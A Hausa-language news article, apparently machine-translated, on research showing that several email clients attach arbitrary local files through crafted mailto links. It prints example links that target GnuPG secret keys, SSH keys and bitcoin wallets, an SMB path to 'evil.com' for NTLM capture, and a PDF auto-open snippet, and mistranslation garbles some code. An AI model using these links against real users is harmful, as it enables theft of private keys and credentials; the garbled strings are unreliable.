Masu bincike daga Jami'ar Ruhr Bochum (Jamus)
mahada"
Abokan ciniki na wasiƙa Thunderbird, GNOME Juyin Halitta (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM / HCL Notes (CVE-2020-4089) da Pegasus Mail sun kasance masu rauni ga mummunan harin da ke ba ku damar haɗa kai tsaye. kowane fayil na gida, ƙayyadaddun ta hanyar hanyar haɗi kamar "mailto:? haɗe = hanya_to_file". An haɗe fayil ɗin ba tare da nuna gargadi ba, don haka ba tare da kulawa ta musamman ba, mai amfani bazai lura cewa za a aika wasiƙar tare da abin da aka makala ba.
Misali, ta amfani da hanyar haɗi kamar "mailto:[email kariya]&subject=Title&body=Text&apach=~/.gnupg/secring.gpg" zaku iya saka maɓallan sirri daga GnuPG cikin harafin. Hakanan zaka iya aika abubuwan da ke cikin wallet ɗin crypto (~/.bitcoin/wallet.dat), maɓallan SSH (~/.ssh/id_rsa) da kowane fayiloli masu iya samun dama ga mai amfani. Bugu da ƙari, Thunderbird yana ba ku damar haɗa ƙungiyoyin fayiloli ta hanyar abin rufe fuska ta amfani da ginin kamar "haɗe = / tmp / * .txt".
Baya ga fayilolin gida, wasu abokan cinikin imel suna aiwatar da hanyoyin haɗin yanar gizo zuwa ma'ajiyar cibiyar sadarwa da kuma hanyoyi a cikin sabar IMAP. Musamman ma, IBM Notes yana ba ku damar canja wurin fayil daga cibiyar sadarwar cibiyar sadarwa lokacin sarrafa hanyoyin haɗin gwiwa kamar "haɗe =\evil.com\dummyfile", da kuma kutsawa sigogin tantancewar NTLM ta hanyar aika hanyar haɗi zuwa uwar garken SMB wanda maharin ke sarrafawa. (za a aika da buƙatar tare da mai amfani da sigogin tantancewa na yanzu).
Thunderbird yayi nasarar aiwatar da buƙatun kamar "haɗe = imap:///fetch>UID>/INBOX>1/", wanda ke ba ka damar haɗa abun ciki daga manyan fayiloli akan sabar IMAP. A lokaci guda, saƙonnin da aka samo daga IMAP, waɗanda aka rufaffen ta hanyar OpenPGP da S/MIME, abokin ciniki na wasiku yana ɓoye su ta atomatik kafin aikawa. Masu haɓaka Thunderbird sun kasance
Tsoffin nau'ikan Thunderbird kuma sun kasance masu rauni ga wasu bambance-bambancen harin guda biyu akan PGP da S/MIME da masu binciken suka gabatar. Musamman Thunderbird, da kuma OutLook, PostBox, eM Client, MailMate da R2Mail2, sun kasance ƙarƙashin harin maye gurbin maɓalli, wanda ya haifar da gaskiyar cewa abokin ciniki na mail yana shigo da sabbin takaddun shaida ta atomatik da aka watsa a cikin saƙonnin S/MIME, wanda ke ba da izini. maharin don shirya sauya maɓallan jama'a wanda mai amfani ya rigaya ya adana.
Harin na biyu, wanda Thunderbird, PostBox da MailMate ke da saukin kamuwa da shi, yana sarrafa fasalulluka na tsarin don adana daftarin saƙon kai tsaye kuma yana ba da izini, ta amfani da sigogin mailto, don ƙaddamar da ɓoyayyen saƙon da aka ɓoye ko ƙari na sa hannu na dijital don saƙonnin sabani, tare da watsa sakamakon na gaba zuwa uwar garken IMAP na maharin. A cikin wannan harin, ana watsa rubutun ta hanyar sigar "jiki", kuma ana amfani da alamar "meta refresh" don fara kira zuwa uwar garken IMAP na maharin. Misali: ' '
Don aiwatar da hanyoyin haɗin kai ta atomatik ba tare da hulɗar mai amfani ba, ana iya amfani da takaddun PDF na musamman - aikin OpenAction a cikin PDF yana ba ku damar ƙaddamar da mai sarrafa mailto ta atomatik lokacin buɗe takarda:
% PDF-1.5
1 abj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 abj
<< /Nau'in /Aiki /S / URI/URI (mailto:?body=——fara SAKON PGP——[…])>>
endobj
source: budenet.ru